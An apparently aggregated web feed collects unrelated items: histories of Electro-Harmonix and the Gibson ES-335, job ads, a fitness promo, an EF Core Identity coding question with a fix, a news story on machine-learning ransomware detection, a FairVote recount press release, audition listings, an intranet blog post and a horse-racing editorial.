    Tremolo was one of the very earliest guitar effects and Electro-Harmonix offered a solid-state tremolo/vibrato pedal called the Stereo Pulsar and a tube based model called the Wiggler.

    1972 Mike Matthews Freedom Amp
    In 1972 the company came out with The Mike Matthews Freedom Amp. This DC powered amp put out around 25 watts RMS into a 10” speaker and was wired point-to-point. The controls included Volume, Tone, and Bite. The housing was rugged and built to be carried around. It was possibly the first battery powered amplifier.

    Interior of Freedom Amp with battery clips

    The only drawback was that it took 40 D cell batteries to power the thing. It was also available as a bass model or as a public address amplifier, which came with built-in reverb.

    '90's EH Freedom Amp
    An updated 1990's version of this amplifier was later produced, with lower wattage but an all wood cabinet. This version came with a wall adapter and a rechargeable battery.

    By 1982 Electro-Harmonix was facing a multiplicity of problems. First there was a labour union dispute, and about the same time the company filed for bankruptcy protection. Two years later, in 1984, Electro-Harmonix was in deeper financial trouble, and Mike Matthews decided to shift his attention away from the little effects boxes to a new venture.

    Mike Matthews

    He launched a new company, the New Sensor Corporation, with manufacturing based in the Soviet Union. Matthews saw the need for vacuum tubes, which were no longer being manufactured in the United States and were in short supply, but were plentiful in the USSR.

    Sovtek Tubes
    Matthews put together factories in three Russian cities to produce Sovtek tubes and eventually became one of the largest suppliers of vacuum tubes in the world. To this day they still offer a variety of the most popular tubes used in modern amplifiers.

    Sovtek Mig 50 amplifier
    At the time the company went on to produce several tube amplifiers under the Sovtek brand name, including the Mig 50, the Mig 60, and the Mig 100, all named after Russian fighter jets.

    These amps were based on popular circuits and can still be found on the web at bargain prices.

    New Sensor EH Russian made Big Muff Pi

    In 1990 Electro-Harmonix resumed building effects pedals. Some of these were made in Russia through 2009.

    EH 2006 Nano Pedals

    In 2006 the smaller and more standardized "micro" and "nano" effect lines using surface-mount circuit components were introduced.

    The circuit board manufacturing was outsourced, but the final assembly of the pedals was done in New York.

    Vintage EH Micro Synthesizer

    When synthesizers came into vogue, EH offered the Micro Synthesizer for guitar or bass and the HOG (Harmonic Octave Generator) effects unit.

    An original EH POG

    The POG, or Polyphonic Octave Generator, was released in 2005, and an enhanced version called the POG 2 came out in 2009. These units allowed your instrument to produce notes two octaves up and one octave below the guitar’s signal.

    EH 22 Caliber Amplifier

    Two of the more interesting modern Electro-Harmonix creations may look like effects pedals, but are actually amplifiers housed in pedal-sized effects boxes. The EHX 22 Caliber was a 22 watt solid-state amplifier capable of driving an 8 or 16 ohm speaker cabinet.

    EH 44 Magnum Amplifier

    It was discontinued and replaced by the EHX 44 Magnum, which could pump 44 solid-state watts into an 8 or 16 ohm speaker cabinet. These are small enough to pack into your guitar case. It is important to note that these units must be connected to a speaker load to work.

    Electro-Harmonix C9

    For 2016 and 2017 Electro-Harmonix has developed some amazing pedals that can coax organ or piano sounds from your guitar without the need for special pickups.

    Electro-Harmonix B9

    The C9 and B9 Organ Machines replicate the sounds of several different types of organs, from Hammond organs to church organs, to combo organs.

    Electro-Harmonix Key 9

    The Key 9 Electric Piano Machine produces a number of electric piano sounds. Combine any of these with the Lester G Deluxe Rotary Speaker emulator or the Lester K Rotary Speaker emulator and as a guitarist you now have all the tools of a keyboard player without the weight of hauling a B-3 and a Leslie cabinet.

    Electro-Harmonix Mel 9

    The Mel 9 Tape Replay Machine produces sounds from your guitar that were only possible with a Mellotron.

    A few of the Electro-Harmonix effects

    Electro-Harmonix now offers a line-up far too numerous to mention every product, covering not just guitar effects but bass effects, drum effects and vocal effects. They also offer updated versions of their original effects that sell at a much lower price than the vintage models.

    As a reminder, the sources for the pictures can be found by clicking on the links below them and the links in the text will take you to further interesting facts.
    ©UniqueGuitar Publishing (text only)

              The Gibson ES-335    
    Mark Knopfler's '58 ES-335
    The 1950’s were essential years in perfecting the design of the electric guitar. For Gibson Guitars, under the leadership of Ted McCarty, 1958 was a magical year. He and his team had come up with a series of futuristic solid body guitar designs, which included the Flying V, the Explorer and the elusive Moderne, but they also created one of the most original and iconic electric guitars of all time: the ES-335TD, or Electric Spanish model 335 Thin - Double Pickups. Or, as it is more commonly known, the Gibson ES-335.

    1958 ES-335

    McCarty felt the ES-335 was right behind the Les Paul solid body as the company's most important body design. He stated, “I came up with the idea of putting a solid block of maple in an acoustic model. It would get some of the same tone as a regular solidbody, plus the instrument's hollow wings would vibrate and we'd get a combination of an electric solidbody and a hollow body guitar.”

    In 1952 Gibson had taken a chance on producing Les Paul’s concept of a solid body guitar, which would eliminate the electronic feedback common to hollow body electric guitars when they were amplified loudly.

    Les Paul with The Log
    To prove this point, in 1941 Les Paul had created “The Log”, a solid piece of 4 x 4 pine wood onto which he had attached an Epiphone Broadway guitar neck. Two single coil pickups were mounted to the wooden frame, along with a tailpiece to anchor the strings. To make it appear to be a guitar, Paul had sawed the body of an Epiphone guitar in half and bolted the “wings” on either side of the pine plank. And that instrument did not feed back.

    A modern ES 335 with maple block

    This concept was essentially repeated with the Gibson ES-335. Its body had wings that were hollow shells of maple with F-holes over those chambers, but a significant maple block separated the two sides; it was routed out to contain the pickups and anchor the neck.

    '48 L-5
    In the 1950’s Gibson had its feet staunchly planted in the hollow body guitar market, manufacturing some of the finest electric and acoustic instruments. Up until the production of the ES-335, all Gibson guitars with cutaways had been manufactured with a single cutaway, either Venetian or Florentine, but never with two.

    '49 Bigsby Guitar

    Fender had been making its double cutaway Stratocaster since 1954. Surprisingly enough, Paul Bigsby had built double cutaway guitars as early as 1949. And Bigsby’s guitars, though solid in appearance, were actually hollow body instruments.

    '55 Mousegetar
    Now this may sound far-fetched, but in 1958 one of the most popular television shows was The Mickey Mouse Club. Host Jimmy Dodd played a tenor guitar that Walt Disney commissioned from Candelas Guitars of East Los Angeles. Walt wanted that guitar to appear as if it had “mouse ears”, so the Mousegetar was built with double cutaways in 1955, three years before the ES-335. I have to wonder if this particular guitar inspired anyone in the Gibson design department.

    By 1958 Gibson had latched on to the double cutaway concept.

    An original 1958 Gibson ES-335 carried a suggested retail price of $335, although in 1958 most were selling at around $267.50. By the way, in today's money $267.50 is equivalent to around $4,000 USD.

    1958 Gibson ES-335
    In 1958 the ES-335 body was 1 3/4” deep and had the usual Gibson scale of 24 3/4”. The top and back of the double cutaway body were made of laminated maple, as was the center block. The body had single white binding around its perimeter. The neck was also made of laminated maple for added strength; on original models it was not bound and had a rather large feel to it. The fretboard was made of rosewood with pearl dot inlays.

    1958 ES-335 Neck view
    The original ES-335 guitars came with either a stop tail piece or a Bigsby B7 vibrato tail piece, which sometimes came with a sticker that said “CustomMade” to hide the routing holes for the stop bar. The bridge/saddle was a tune-o-matic model with adjustable nickel saddles.

    PAF Sticker from 1958 humbuckers
    This guitar came with twin PAF humbucking pickups and each had an individual volume and tone control in a gold finish with gold tops. Nearby was a three-way selector switch with an amber plastic top. The original models came with the long beveled pickguard. The strap button was made of plastic.

    This year the ES-335 was only available in a sunburst or natural finish.

    1959 ES-335 Cherry finish
    A year later the familiar cherry red finish was added as an option, and binding was added to the neck. Some of the 1958 models had irregularities in the shape of the neck; by 1959 these issues were resolved. A 1959 ES-335 is considered a very desirable guitar by collectors.

    1960 ES-335

    A few changes occurred in 1960. The neck was given a thinner back shape, the volume/tone knobs received chrome reflector tops, and the pickguard was shortened so that it no longer extended past the bridge.

    1961 ES-335

    In 1961, Gibson discontinued the ES-335 with a natural finish. This year the strap buttons were changed to metal, and the selector switch tip colour was gradually changed to white. Most notably, the serial number was stamped into the back side of the headstock.

    1962 ES-335
    Big changes occurred in 1962. Instead of pearl dot inlaid fret markers, the markers were now small block inlays. The shape of the cutaways changed slightly, becoming rounder instead of more pointed. The saddles in the tune-o-matic bridge were now made of white nylon. And, though most of us will never see it, the PAF sticker on the back of the humbucking pickups now showed the patent number.

    By 1963 the neck shape gradually got larger again.

    1965 Gibson ES-335 
    In 1965 Gibson changed the stop tailpiece to a chrome trapeze model. This may have been the most visible change, but the most dramatic was the width of the neck at the nut, which changed from 1 11/16” to 1 9/16”.

    1966 ES-335

    By 1966 the Brazilian rosewood on the fretboard was changed to Indian rosewood. The neck angle decreased from 17 degrees to 14 degrees. The bevel of the pickguard was also changed making the black/white/black layers less noticeable.

    1968 Gibson ES-335

    By 1968 Gibson made the nut and neck slightly wider again, returning to the 1 11/16” spacing.

    1969 ES-335 Walnut Finish

    It was not until 1969 that any more changes occurred. That year the guitar was offered with a walnut finish.

    1977 ES-335 with coil tap switch

    In 1977 Gibson, now owned by Norlin, added a coil tap switch on the upper treble cutaway to keep up with the trends of the day.

    1981 ES-335DOT

    In 1981 the ES-335TDC was discontinued, but replaced with the ES-335DOT. These were made through 1985 and were very good guitars.

    1990 Gibson ES-335

    By 1990 the Gibson ES-335DOT was discontinued and replaced with the Gibson ES-335 reissue which remains in production.

    ES-335 Artist
    Through the years Gibson issued some variants on the ES-335 model, including a 1981 model called the ES-335 Artist (or, more properly, the ES Artist), which came with a large headstock logo, no F-holes, a metal truss rod cover, gold hardware, and three knobs. The circuitry inside the guitar was developed by Moog.

    1987 ES-335 CMT

    From 1983 to 1987 the ES-335 CMT was available: a guitar very similar to the ES-335DOT, but with a curly maple top and back and gold hardware.

    1990 ES-335 Studio

    I recall that the music store I used to spend time at had a Gibson ES-335 Studio model. It was Gibson’s effort to update the model and offer it at a lower price point. This guitar had no F-holes and came with twin Dirty Fingers humbucking pickups. These were made from the mid 1980’s through 1991.

    1988 ES-335 Showcase Edition

    The Gibson ES-335 Showcase Edition lasted only a year. The hardware was black. It came with two EMG pickups. The guitar was either white or beige. Only 200 units were made in 1988.

    '94 ES-335 Centennial

    1994 gave us the Gibson ES-335 Centennial model to celebrate the company’s founding. This also was a limited edition of only 100 units. This guitar came with a gold medallion on the headstock and the tailpiece had diamond inlays.

    1998 ES-335 Historic '59

    Four years later Gibson came out with the ES-335 Historic Collection, which was a replica of their original 1959 ES-335.

    '85 ES-335 Nashville made
    By 1984 Gibson had moved all electric guitar production out of Kalamazoo, Michigan to Nashville, Tennessee. The ES-335 was then being made at the Nashville factory.

    However in 2000 Gibson opened a facility in Memphis, Tennessee. This is where ES-335’s are built today.

    In the years following 1958, Gibson made other models based on the ES-335: the ES-330, which was a hollow body guitar; the ES-345 and ES-355, which had a broader tonal palette and were fancier guitars; and even the Trini Lopez Standard, which had a similar body but different sound holes, inlays, and headstock. The ES-335 remains the original starting point for all of these models.

    Click on the links in the photographs for their source. Click on links in the text for further information.

    © UniqueGuitar Publishing (for text only)

              Database Developer - MaRS Discovery District - Toronto, ON   
    Minimum 2 years’ experience developing ETL and data processes, ideally in Python including libraries such as Pandas, and json or other programming and data...
    From Indeed - Mon, 12 Jun 2017 17:02:59 GMT - View all Toronto, ON jobs
              The Vertical Project Exercises to Improve Your Vertical Jump   
    The Vertical Project

    People involved in sports, especially basketball, volleyball, soccer, and football, are often interested in finding ways to increase their vertical jump. There are many exercises and programs available that are specially designed for improving the vertical leap of a person. Before starting any of these programs though, you should at least be in good enough physical condition to start the program. Here we list a few exercises that you could start with before undertaking a training program. These will help get you started.
    Warm Ups

    Before starting the exercises, you need to warm up your muscles. Jog for ten minutes or run up and down the stairs for a few minutes. Extensive leg stretches are another way to warm up. These simple exercises help condition your body, and warming up before exercising prepares the muscle fibers used for jumping.

    Skipping Rope

    Skipping rope is an exercise that should not be overlooked, as it will help increase the strength of your legs. Moreover, it helps maintain excellent cardiovascular condition. Do this exercise for fifteen to thirty minutes on a regular basis; doing it early in the morning gives good results.

    Knee Raises

    Hold an overhead bar firmly, with your arms about shoulder-width apart. Hang from the bar with your arms fully extended and knees bent slightly. Hold this position and slowly raise your knees towards your chest, squeezing your stomach muscles as you do. Hold your knees there for a few seconds before lowering your legs towards the floor. Repeat the process five times.

    Knee Bends

    One of the best ways to increase your leg strength is by bending the knees. Stand in an upright stance - straight, with chest out and keeping your back tight. Now, bend your knees slowly, keeping the back straight. Crouch, in a slow motion, to the maximum possible extent. Repeat this process 20 times.

    Toe Raises

    Stand straight. Now, raise your right leg in slow motion, until you can touch the tip of your toe with one hand. Pull down slowly and get back to the original position. Now, raise your left leg and repeat the process. Do this 30 times.


    Sit-Ups

    Sit-ups will be very helpful in improving your vertical leap. However, if you want commendable leg strength, simple sit-ups will not be enough. Add variation to this exercise by lying down on the floor with your back straight, then lifting your shoulders from the floor in a slow motion. Do this exercise daily for ten minutes, in the morning and at night. Be careful to use proper form; if done incorrectly, you can hurt your back. You can also try "crunches" instead of sit-ups (or as a variation). Exercises for your waist are important for all physical activity, as it is the "core" area of your body and your ultimate all-around strength and flexibility start here.

    The Vertical Project enhances the results of all the above, enabling you to double your vertical leap.
    Tom Beagle is a writer for EInfohound. You can get more vertical jump tips and information on vertical jump programs on his blog at verticaljump.einfohound.com. This article is provided by Amazines.com - The ULTIMATE Article Database.
    For further information and a special deal on The Vertical Project see the Buy The Vertical Project website.
              Cannot create a DbSet for 'ApplicationUser' because this type is not included in the model for the context   

    I reverse-engineered my database with the scaffold command in the NuGet Package Manager Console (Scaffold-DbContext "[server info]" Microsoft.EntityFrameworkCore.SqlServer -OutputDir Models –Context AppDbContext) then deleted the Identity elements from the resulting context. The problem is, when I run the program and try to register or log in a user, I get the error in the subject line above. It doesn't make sense to manually put ApplicationUser in the context file (which I think is what the error is asking) since it's not a table. (I looked at some colleagues' projects and they don't have ApplicationUser in their contexts.) In the future, if I do a migration, it will create a table by the name of ApplicationUser. Any suggestions?
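    For reference, the usual cause of this error is that the scaffolded context derives from plain DbContext, so ASP.NET Core Identity's user store cannot find ApplicationUser in the model. A minimal sketch of one common fix (the names AppDbContext and ApplicationUser are taken from the question; this assumes ASP.NET Core Identity on EF Core) is to have the context inherit from IdentityDbContext<ApplicationUser> and call base.OnModelCreating so the Identity entities are added to the model:

    ```csharp
    using Microsoft.AspNetCore.Identity;
    using Microsoft.AspNetCore.Identity.EntityFrameworkCore;
    using Microsoft.EntityFrameworkCore;

    public class ApplicationUser : IdentityUser { }

    // Inheriting from IdentityDbContext<TUser> (instead of DbContext)
    // includes ApplicationUser and the other Identity entities in the model.
    public class AppDbContext : IdentityDbContext<ApplicationUser>
    {
        public AppDbContext(DbContextOptions<AppDbContext> options)
            : base(options) { }

        // Scaffolded DbSets for your own tables stay here as before.

        protected override void OnModelCreating(ModelBuilder modelBuilder)
        {
            // Required: configures the Identity tables before the
            // scaffolded entity configuration is applied.
            base.OnModelCreating(modelBuilder);

            // ...scaffolded configuration follows...
        }
    }
    ```

    No ApplicationUser table needs to exist yet; a later migration would create the Identity tables. Alternatively, some projects keep two contexts, one for Identity and one for the scaffolded tables.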

              Executive Assistant to the VP, Corporate Services - The Canadian Foundation for Healthcare Improvement - Canada   
    Excel, PowerPoint, Outlook, SharePoint, Skype for Business and advanced database. Technical/Specialized or Program....
    From The Canadian Foundation for Healthcare Improvement - Fri, 19 May 2017 00:12:44 GMT - View all Canada jobs
              How artificial intelligence is taking on ransomware   
    Twice in the space of six weeks, the world has faced major attacks of ransomware — malicious software that locks up photos and other files stored on your computer, then demands money to release them. Despite those risks, many people just aren’t good at updating security software. In the early days, identifying malicious programs such as viruses involved matching their code against a database of known malware. [...] a program that starts encrypting files without showing a progress bar on the screen could be flagged for surreptitious activity, said Fabian Wosar, chief technology officer at New Zealand security company Emsisoft. An even better approach identifies malware using observable characteristics usually associated with malicious intent — for instance, by quarantining a program disguised with a PDF icon to hide its true nature. For that, security researchers turn to machine learning, a form of artificial intelligence. The security system analyzes samples of good and bad software and figures out what combination of factors is likely to be present in malware. On the flip side, malware writers can obtain these security tools and tweak their code to see if they can evade detection. Some websites already offer to test software against leading security systems. Dmitri Alperovitch, co-founder and chief technology officer at Irvine vendor CrowdStrike, said that even if a particular system offers 99 percent protection, “it’s just a math problem of how many times you have to deviate your attack to get that 1 percent.” Though Cylance plans to release a consumer version in July, it says it’ll be a tough sell — at least until someone gets attacked personally or knows a friend or family member who has.

    FOR IMMEDIATE RELEASE                                                 

    Contact: Dania Korkor, Email: dkorkor@fairvote.org, Phone: (301) 270-4616

    The razor-thin margin of 0.01% in the race for second and a spot on the November ballot in the California controller race has highlighted California’s unique recount law and underscores the case for reform. FairVote’s research, data and analysis on statewide recounts across the country reveal that statewide recounts are exceptionally rare, outcomes reversals post-recounts are rarer and many state recount laws should be altered in multiple ways in order to be more efficient and effective.

    “The California recount is a rare statewide contest in which the recount could change the outcome,” said FairVote legal analyst Dania Korkor. “But the way it is being conducted underscores that California should adopt new laws to structure recounts. Right now, its recount law is among the worst in the nation.”

    Unlike 18 other states, California does not establish an automatic recount funded by taxpayers no matter how close the margin. Instead, it allows individual voters to initiate recounts by targeting specific counties, choosing the order in which the precincts are to be recounted, and being able to request to recount any of the remaining precincts for up to 24 hours after the initial recount. The voter pays a deposit before each day of the recount and if the voter’s candidate is ultimately declared the winner, the deposits are refunded. If the outcome were to change, other voters associated with the now-losing candidate could select additional jurisdictions for a recount, potentially triggering an expensive, litigious, controversial process of a recount see-saw.

    While other states allow partial recounts and/or payment dependent on the outcome, California is unique in using a picking and choosing of precincts method. Such a law can lead to dragged out recounts—Californians voted for controller over a month ago and the recount is ongoing—and potentially unfair outcomes due to “cherry-picked” recounts.

    Instead of California’s bizarre, precarious system, FairVote proposes that California modernize its recount law. According to FairVote’s research of all statewide recounts occurring from 2000-2009 and its updated review of recounts in 2010-2012, full statewide recounts are rarely necessary, as the average change in victory margin is less than 0.03%. But because accuracy in all elections is vital, FairVote recommends that states fund risk-limiting audits that can catch potential fraud or technological error in any race. The number of ballots to review should increase as the victory margin in a race decreases, and an election as close as the California controller race should trigger an automatic government-financed, statewide recount of all ballots. Finally, FairVote also recommends allowing presidential candidates to pay for an accelerated initial recount if the state does not find ways to get the count done quickly.

    For more details on FairVote’s research and recommendations, see our report. An updated version assessing recounts from 2000-2013 will be released shortly.


    FairVote is a nonpartisan, nonprofit organization that educates and enlivens discourse on how best to remove the structural barriers to a democracy that respects every voice and every vote in every election. For more information, contact FairVote legal analyst Dania Korkor at (301) 270-4616 or by email at dkorkor@fairvote.org.

              Global High Performance Plastics Sales Market 2017 Product Type, Segmentation, Size, Industry Trends, Specification and Forecast to 2022   
    Global High Performance Plastics Sales Market 2017 Product Type, Segmentation, Size, Industry Trends, Specification and Forecast to 2022 The report’s analysis is based on technical data and industry figures sourced from the most reputable databases. Other aspects that will prove especially beneficial to readers of the report are: investment feasibility analysis, recommendations for growth, investment return analysis, trends

              Global High Chrome Steel Grinding Media Balls Sales Market 2017 Product Type, Segmentation, Size, Industry Trends, Specification and Forecast to 2022   
    Global High Chrome Steel Grinding Media Balls Sales Market 2017 Product Type, Segmentation, Size, Industry Trends, Specification and Forecast to 2022 The report’s analysis is based on technical data and industry figures sourced from the most reputable databases. Other aspects that will prove especially beneficial to readers of the report are: investment feasibility analysis, recommendations for growth, investment return analysis, trends

              Global Hexamethylene Triamine Sales Market 2017 Product Type, Segmentation, Size, Industry Trends, Specification and Forecast to 2022   
    Global Hexamethylene Triamine Sales Market 2017 Product Type, Segmentation, Size, Industry Trends, Specification and Forecast to 2022 The report’s analysis is based on technical data and industry figures sourced from the most reputable databases. Other aspects that will prove especially beneficial to readers of the report are: investment feasibility analysis, recommendations for growth, investment return analysis, trends

              Upcoming Non-Equity Auditions Sunday, Jun. 18   
    Below are BroadwayWorld.com's upcoming listings of Non-Equity Auditions, as of Sunday, June 18, 2017 onwards. Catch up below on anything that you might have missed from today on BroadwayWorld.com!

    To browse the complete listings, sign up for email alerts and more, click here.

    6/19/2017 - 6/21/2017 Full Cast in Memphis: The Musical at The Kelsey Theatre
    Click Here for More Information

    6/19/2017 - 6/27/2017 Actors, Singers, Dancers in Funny Girl at The Candlelight Theatre
    Click Here for More Information

    6/19/2017 - 6/20/2017 Non-Equity Performers in MIRACLE ON 34TH STREET at Weston Friendly Society
    Click Here for More Information

    6/19/2017 - 6/20/2017 Non-Equity Actors in NUTS at Buck Creek Playhouse
    Click Here for More Information

    6/19/2017 Non-Equity Actors in CHAPTER TWO (NJ) at Pegasus Theatre Project
    Click Here for More Information

    6/19/2017 - 6/25/2017 Non-Equity Performers in EVIL DEAD THE MUSICAL at The Barnstormers
    Click Here for More Information

    6/20/2017 - 6/21/2017 Non-Equity Actors in THE ODD COUPLE at The Elmwood Playhouse
    Click Here for More Information

    6/20/2017 - 6/21/2017 Non-Equity Performers in STRANGEST THINGS! THE MUSICAL at Random Acts
    Click Here for More Information

    6/20/2017 - 6/22/2017 Non-Equity Actors in JEFF FORT AND FRED HAMPTON: A REVOLUTIONARY LOVE STORY at Truth Productions
    Click Here for More Information

    6/21/2017 OPEN in HOLLAND AMERICA LINE at RWS Entertainment Group
    Click Here for More Information

    6/21/2017 - 6/25/2017 Non-Equity Performers in JOSEPH AND THE AMAZING TECHNICOLOR DREAMCOAT at Theatre Unlimited Performing Arts
    Click Here for More Information

    6/22/2017 Actors and Singers in Merrily We Roll Along at The Ultimate Search Theater Company
    Click Here for More Information

    6/22/2017 Singers, Dancers, Actors in DREAMGIRLS at Lower Ossington Theatre
    Click Here for More Information

    6/23/2017 - 6/24/2017 Non-Equity Student Performers in SEUSSICAL, THE MUSICAL at Dare to Defy Productions
    Click Here for More Information

    6/23/2017 - 6/24/2017 Non-Equity Performers in INTO THE WOODS at GetUp Stage Company
    Click Here for More Information

    6/24/2017 - 6/25/2017 Non-Equity Child Performers in A CHRISTMAS CAROL at Cincinnati Playhouse in the Park
    Click Here for More Information

    6/24/2017 - 6/25/2017 Non-Equity Performers in THE ENSEMBLE THEATRE 2017-18 SEASON at The Ensemble Theatre
    Click Here for More Information

    6/24/2017 Non-Equity Actors in AFTER THE FALL at Aux Dog Theatre
    Click Here for More Information

    6/24/2017 Actors in African-American Shakespeare Company's 2017/18 Season at African-American Shakespeare Company
    Click Here for More Information

    6/24/2017 - 6/25/2017 Non-Equity Actors in LOST IN YONKERS at Heritage Players
    Click Here for More Information

    6/24/2017 Non-Equity Performers in KISS ME, KATE CONCERT **Date Change** at Bay Street Theater
    Click Here for More Information

    6/25/2017 - 6/26/2017 Non-Equity Actors in DESIRE UNDER THE ELMS at Firehouse Theatre
    Click Here for More Information

    6/25/2017 OPEN Singers in UN BALLO IN MASCHERA at Opera Mariposa and the Heroic Opera Company
    Click Here for More Information

    6/25/2017 - 6/26/2017 Non-Equity Performers in OVER THE RIVER AND THROUGH THE WOODS at Town Players
    Click Here for More Information

    6/25/2017 Non-Equity Performers in THE BEST LITTLE WHOREHOUSE IN TEXAS at Sutter Street Theatre
    Click Here for More Information

    6/26/2017 - 6/27/2017 Non-Equity Actors in SEX PLEASE WE'RE SIXTY at Waukesha Civic Theatre
    Click Here for More Information

    6/26/2017 Non-Equity Actors in ON GOLDEN POND at Riverside Center for the Performing Arts
    Click Here for More Information

    6/26/2017 Non-Equity Actors in THE MURDER MYSTERY COMPANY at The Murder Mystery Company
    Click Here for More Information

    6/26/2017 Non-Equity Performers in SISTER ACT at The Way Off Broadway Dinner Theatre
    Click Here for More Information

    6/26/2017 - 6/27/2017 Non-Equity Performers in LITTLE SHOP OF HORRORS at The Vagabond Players
    Click Here for More Information

    For more Non-Equity Auditions, click here.
              Administrative Assistant III   
    TX-Dallas, Job Description: Advanced administrative responsibilities include preparation of more complex reports/presentations and analysis using various software packages and databases. Is considered a specialist in the department or division, responsible for a complete process of complex nature. Duties will include determining methods and procedures used to accomplish tasks. Hours: 8:00am to 5:00pm Work We
              GreenPlum Developer   
    TX-Dallas, Position: GreenPlum Developer Location: Dallas, TX Duration: FULL TIME Salary: Open Description: Minimum of 5 years experience in distributed application development and system analysis. Hands on exp on GreenPlum Database Experienced in RDBMS – like Oracle Experience in Oracle development (PL/SQL Procedures and Functions, Triggers, Table and Record type variables advance PL/SQL) Experienced in wri
              Intranets and social computing - first mover disadvantage?   
    As you may know, in the past I worked at Ernst & Young in their Centre for Business Knowledge, the group who are responsible for the “KWeb” intranet. Outside of the top tier accounting firms (who have always understood they are involved in knowledge work), I’ve yet to find any large organisations with such a cohesive or advanced intranet, so I like to track public case studies and articles about Ernst & Young’s intranet and knowledge management program to see how it is progressing since I left in 2004.

    Anyway, I was interested to read on the Intranet Benchmarking Forum’s blog that they had recently attended a leadership conference to provide a briefing on:
    the latest trends amongst advance intranets and to parlay that information into a strategic roadmap for a next-generation intranet.
    Alas, we don’t hear much about the audience’s reaction to these trends. I wonder how well E&Y’s intranet would benchmark against those trends, because there wasn’t really a lot there that struck me as new. I must admit this actually irritates me slightly - and I’ll apologise if there is a touch of arrogance here - but it really is time that the intranet industry takes a long hard look at itself and admits that it’s not really a case of some organisations facing a set of new trends; they are really just catching up with innovation that’s been taking place in other organisations over the last decade or more.

    Let’s look at this apparently emerging issue about the “conflict between the desire to open up will be tempered by risk management and control”, as by its very nature the KWeb intranet is an open system that runs primarily on user-generated content. While I worked there, E&Y had hundreds of unmoderated, unfiltered discussion forums and thousands of project team databases. I don’t recall any major incidents, although I do remember some of the conversations about e-commerce getting quite heated! The only moderation processes that did exist were for the minority of ‘highly filtered’ knowledgebases, like PowerPacks - however, this moderation was for content quality.

    Fast forwarding to the present day, this only appears to be a trend now in other, less progressive organisations, as Web-based collaboration tools (like SharePoint) have started to muscle into the traditional intranet space (e.g. static pages of content pushed at users to eagerly consume).

    But it’s not a trend pointing to the future; it’s an indicator that you are lagging behind in how you imagine what an intranet should be. On the other hand, I suspect Ernst & Young and those like it aren't lacking vision, but they may be struggling to take advantage of new Web 2.0-inspired enterprise technologies because of what’s in place already.

    Another former employer, CSC, is a large organisation and presents another interesting case study from this point of view. They have a well established extranet, rather than an intranet, with a portal as a primary front end to multiple Web-based systems and sub-sites. However, while they are in the process of adopting social computing tools they face the challenge of integrating them into that existing Web 1.0-style extranet infrastructure.

    I've seen similar situations in other large organisations I've worked with, particularly those that already valued collaboration and had already deployed first-generation Web-based collaboration tools.

    From this I think there are in fact two key positions to understand:
    1. Progressive, early-adopter organisations may now be at a disadvantage at a technology level, because they have lots of expensive legacy infrastructure to deal with - however, their culture is much better prepared to adopt a social computing-based intranet, so you can use that to your advantage. Luckily, social computing can help make that transition in a cost-effective way.
    2. Laggard organisations (and smaller organisations that never had access to enterprise groupware in the first place) have a temporary advantage: they can get ahead of the original early adopters if they can get past the cultural and business-political issues that stop them from introducing new collaboration and social computing-based intranets. It’s a lot harder to bootstrap culture change, but with a bit of effort you can fly under the radar at the technology level with social computing if you try. But fundamentally, you have to reinvent what the intranet means to your organisation in order to move forward.
    So, what’s your organisation - an original early adopter or a laggard?

              IT Manager - Benchmark Basking Ridge - Basking Ridge, NJ   
    Assist in the maintenance, support and monitoring of property wide systems such as Delphi network and database, Maestro, Agilysys, Avaya, VingCard, Fios,...
    From Benchmark Hospitality International - Tue, 13 Jun 2017 19:02:23 GMT - View all Basking Ridge, NJ jobs
              Data Entry Clerk 2616   
    AZ-Tempe, Job Description: Receive all documents and enter the data into the on-line system on the PC. Operate a data entry device to input and maintain lists and records. Create and update databases. Maintain a daily count of all claims processed. Typical years experience in field of 1-3 years. Typically holds GED or High School Diploma. This will be part of an image review project where operators will be r
              Comment on [Umbraco Deployment] Exporting MS SQL CE Database to MS SQL Server Express by ErikEJ   
    Actually, do not use the 'with BLOBs' option - you will lose data if you do!
              Salesforce Administrator - TD Sports Group, LLC - Sacramento, CA   
    * Database management * Email blasting * Email blast response management This job is on a contractual as-needed basis. Job Type: Contract Required
    From Indeed - Fri, 16 Jun 2017 16:07:51 GMT - View all Sacramento, CA jobs
              Not Everyone’s a Winner - By Evan Hammonds   

    It’s not unusual to have two winners of a Thoroughbred race—even with advanced photo-finish equipment dead heats happen every once in a while, and we’re a little surprised they don’t happen more often. However, it’s hard to fathom how there are two “winners” of a race when they are four lengths apart at the wire, but that is exactly what racing officials in Pennsylvania are trying to lead us to believe.

    In perhaps one of the more interesting rulings to come from a state racing authority, the State Horse Racing Commission Bureau of Thoroughbred Horse Racing in Pennsylvania declared last month there would be not one, but two winners of the 2016 Parx Oaks.

    In last year’s Parx Oaks, run May 7, Main Line Racing Stable and Joshtylane Farm’s Miss Inclusive—trained by John Servis—finished first by four lengths but was later disqualified for testing positive for clenbuterol. Gryphon Investments’ Eighth Wonder was elevated to first and the $60,000 winner’s share of the purse was redistributed. Servis was handed a 15-day suspension.

    However, in an amended ruling dated May 19, 2017, signed by bureau director Tom Chuckas, the commission stated that: “Miss Inclusive shall be deemed to have finished first along with the horse Eighth Wonder, for the purpose of both maintaining each horse’s racing record and determining each horse’s eligibility to enter in future races, the forfeiture of the purse will remain in effect and the redistribution of the purse will stand and the 15-day suspension shall be modified to a $5,000 fine.”

    In this unprecedented move the commission has allowed for both horses to be listed as the “winner” of the black-type race (while the connections of Eighth Wonder retain the purse), along with a second-place finisher and a third-place finisher.

    Say what?

    The implications here go far beyond just the black-type that will appear on catalog pages for decades to come.

    It’s more about rules—not only making them, but enforcing them instead of bending them. If a commission doesn’t deem its rules of racing regarding medication overages—or any other infraction for that matter—fair, then seek to change them, but by all means enforce them.

    In an effort to stem the ramifications of the ruling nationally, Equibase, the industry-owned database of racing information and statistics, took its own action. On June 2 Equibase removed the official chart of the 2016 Parx Oaks, placing it under review and issuing a statement.

    “Equibase has removed the official chart for this race from its website while we review the implications of this matter on our database and how the database should reflect the race results,” said Jason Wilson, president and COO of Equibase. “We view the integrity of the results and the data, and the clarity with which we can present it, to be paramount in this regard. We will inform the industry when a final determination about the official Equibase chart has been made.”

    The move by Equibase—equally unprecedented—follows on the heels of the reintroduction of the Horseracing Integrity Act of 2017 by Reps. Andy Barr (R-Ky.) and Paul Tonko (D-N.Y.). The Jockey Club’s James Gagliano makes a case for the federal legislation, pointing to several recent incidents, including the Pennsylvania ruling.

    While there is a difference of opinion among racing’s many factions regarding the federal bill, certainly we can all agree on racing’s need for a “level playing field.” And that should apply to what goes on in the stable area and the racetrack as well as in any commission meeting.

